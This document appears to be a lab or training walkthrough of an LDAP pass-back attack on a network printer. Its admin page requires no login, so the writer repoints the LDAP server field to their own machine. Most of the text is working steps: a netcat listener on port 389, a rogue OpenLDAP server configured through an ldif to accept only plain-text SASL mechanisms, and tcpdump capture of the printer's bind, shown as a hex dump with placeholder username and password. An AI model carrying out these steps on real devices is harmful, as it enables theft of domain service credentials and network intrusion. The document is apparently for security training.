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LDAP Pass-Back Attack

LDAP Pass-Back Attack can be performed when we gain access to a Device Configuration where the LDAP parameters are Specified [Web Interfaces etc..]

There we can alter the LDAP Configuration, such as the IP - Hostname of the LDAP server. In an LDAP Pass-Back Attack, we can modify this IP to our IP and then test the LDAP configuration, which will force the device to attempt LDAP Authentication to our Rogue Device. We can Intercept this Authentication attempt to Recover the LDAP Credentials.


There is a Network Printer in this Network where the Administration Website does not require Credentials. Inspecting the code we can verify that the Printer Website is secure enough to not send the Credentials in Plain-Text.

| PASSWORD |**********
| Test Settings | Save Settings |

We have the Username but not the Password. When we press Test Settings an Authentication request is made to the Domain Controller to test the LDAP Credentials. We can exploit this to get the Printer to Connect back to us since we can Modify the Server Value.

We can do that by Changing the Server IP to our IP and Listening on PORT: 389.

Rogue LDAP Server

The SupportedCapabilities Response Indicates a Problem. Before the Printer sends over the Credentials, it is trying to negotiate the LDAP Authentication method Details. It will use this negotiation to select the most Secure Authentication method that both the Printer and the LDAP Server Support.

We need to create a Rogue LDAP Server and Configure it to send Credentials in Plain-Text.

nc -lvp 389
Connect to [] from (UNKNOWN) []



:: Required Packages
[slapd - ldap-utils]

:: Configure the Service
systemctl enable slapd
dpkg-reconfigure -p low slapd
:: Omit Open LDAP Server Configuration
:: DNS Domain Name
:: Organization Name
:: LDAP Database
:: Purge Database
:: Move Old Database


Commands Down Below Should be Run with SUDO Permissions

Configuration File to use Plain-Text as Authentication.

dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Patching LDAP Server with Custom .ldif Configuration.

:: Apply the Configuration
ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif

:: Restart the Service
systemctl restart slapd

Verifying the Settings.

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

:: Response
supportedSASLMechanisms: PLAIN
supportedSASLMechanisms: LOGIN

Capturing LDAP Credentials

tcpdump -SX -i <NetworkInterface> tcp port 389

:: Response
0x0000: 4500 0069 ffd8 4000 7f06 35bf 0ac8 59c9 E..i..@...5...Y.
0x0010: 0a32 5734 d97e 0185 f5fa 95b9 a45e c0ed .2W4.~.......^..
0x0020: 5018 0400 3ef3 0000 3084 0000 003b 0201 P...>...0....;..
0x0030: 1060 8400 0000 3202 0102 0418 7a61 2e74 .`....2...dc.dom
0x0040: 7279 6861 636b 6d65 2e63 6f6d 5c73 7663\USERNAME
0x0050: 4c44 4150 8013 7472 7968 6163 6b6d 656c ........PASSWORD